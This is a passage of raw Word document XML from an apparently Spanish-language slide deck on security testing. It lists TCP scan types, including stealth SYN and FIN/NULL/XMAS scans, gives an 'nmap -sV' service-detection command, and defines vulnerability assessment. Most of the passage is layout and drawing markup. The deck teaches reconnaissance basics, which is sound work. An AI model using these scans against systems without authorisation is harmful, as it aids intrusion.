          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Algunos de ellos son los siguientes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310397A7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="33"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71DDAD7E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1824"/>
        </w:tabs>
        <w:ind w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Escaneo completo TCP (Conectar escaneo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6055B415" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="36"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52EA6677" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1824"/>
        </w:tabs>
        <w:ind w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Escaneo TCP SYN (escaneo sigiloso)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0569BF19" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="35"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44D4C9B8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1824"/>
        </w:tabs>
        <w:ind w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Escaneo TCP ACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324B750E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="34"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13D6726E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1824"/>
        </w:tabs>
        <w:ind w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Escaneo TCP FIN/NULL/XMAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F09F5C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1080" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E1E4525" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:line="605" w:lineRule="exact"/>
        <w:ind w:left="801"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Detección de versiones de servicio: uso de Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4F632D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="389"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="429C7ACE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1044"/>
        </w:tabs>
        <w:spacing w:line="235" w:lineRule="auto"/>
        <w:ind w:right="1690"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>La detección de versiones de servicio, también conocida como captura de banners, es un método utilizado para encontrar el servicio alojado en el puerto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0820194A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="37"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5276E74D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1043"/>
        </w:tabs>
        <w:ind w:left="1043" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Detección de servicios mediante Nmap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36945063" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72DCB084" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1043"/>
        </w:tabs>
        <w:ind w:left="1043" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Comando : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>objetivo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176CADE5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1020" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F57DA12" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2855C101" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="325"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CD9FC61" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:spacing w:before="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1443" w:right="832"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>DEMO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B41E35" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1220" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05F7B298" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2075"/>
        </w:tabs>
        <w:spacing w:line="652" w:lineRule="exact"/>
        <w:ind w:left="2075" w:hanging="1539"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Evaluación de vulnerabilidades</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8B34CF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1224"/>
        </w:tabs>
        <w:spacing w:before="245" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1224" w:right="3203" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>La evaluación de vulnerabilidades es una revisión sistemática de las debilidades de seguridad en un sistema de información.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19759689" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="222"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F1CB520" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1224"/>
        </w:tabs>
        <w:spacing w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1224" w:right="1614" w:hanging="360"/>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5396480" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="54B8AF6D" wp14:editId="4C2EC97B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2026920</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>794152</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="8304530" cy="4099560"/>
                <wp:effectExtent l="0" t="0" r="0" b="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4530" cy="4099560"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="8304530" cy="4099560"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="414" name="Image 414"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId192" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="8304276" cy="4099558"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="415" name="Graphic 415"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1200912" y="2682239"/>
                            <a:ext cx="5902960" cy="1213485"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="5902960" h="1213485">
                                <a:moveTo>
                                  <a:pt x="1391285" y="38100"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1378585" y="31750"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1315085" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1315085" y="31750"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="516636" y="31750"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="516636" y="44450"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1315085" y="44450"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1315085" y="76200"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1378585" y="44450"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1391285" y="38100"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="5902960" h="1213485">
                                <a:moveTo>
                                  <a:pt x="3456178" y="47371"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3442538" y="40386"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3380359" y="8509"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3380028" y="40271"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2468880" y="31750"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2468880" y="44450"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3379901" y="52971"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3392538" y="53086"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3379901" y="53086"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3379597" y="84709"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3444456" y="53086"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3456178" y="47371"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="5902960" h="1213485">
                                <a:moveTo>
                                  <a:pt x="5519674" y="56515"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5506034" y="49530"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5443855" y="17653"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5443525" y="49415"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4532376" y="40894"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4532376" y="53594"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5443398" y="62115"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5456034" y="62230"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5443398" y="62230"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5443093" y="93853"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5507952" y="62230"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5519674" y="56515"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="5902960" h="1213485">
                                <a:moveTo>
                                  <a:pt x="5902452" y="632536"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="5899404" y="620191"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4829683" y="877049"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4408678" y="968844"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4200398" y="1010742"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3994150" y="1049489"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3790061" y="1084808"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3588512" y="1116126"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3389363" y="1143076"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3193135" y="1165453"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3000121" y="1182573"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2810510" y="1194282"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2716911" y="1197902"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2624328" y="1200086"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2532761" y="1200658"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2442083" y="1199705"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2263495" y="1193533"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2087880" y="1181823"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1916074" y="1165047"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1746123" y="1143482"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1579905" y="1117701"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1414907" y="1087818"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1252474" y="1054506"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1092073" y="1018057"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="933323" y="978839"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="775843" y="937234"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="619633" y="893724"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="309880" y="802309"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="74752" y="730110"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="75895" y="726376"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="84061" y="699744"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="713803"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="61709" y="772591"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="71018" y="742276"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="306197" y="814463"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="616204" y="905929"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="772541" y="949477"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="930021" y="991133"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1089025" y="1030401"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1249807" y="1066914"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1412367" y="1100277"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1577086" y="1130109"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1744345" y="1156055"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1914144" y="1177594"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2086737" y="1194473"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2262632" y="1206207"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2441829" y="1212405"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2532634" y="1213370"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2624455" y="1212786"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2717292" y="1210602"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2811018" y="1206969"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2913316" y="1200658"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3001010" y="1195247"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3194431" y="1178077"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3390887" y="1155687"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3590163" y="1128712"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3792093" y="1097356"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3996436" y="1061999"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4202811" y="1023213"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4411218" y="981290"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4832477" y="889444"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5902452" y="63253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C41B1A" id="Group 413" o:spid="_x0000_s1026" style="position:absolute;margin-left:159.6pt;margin-top:62.55pt;width:653.9pt;height:322.8pt;z-index:-17920000;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page" coordsize="83045,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">
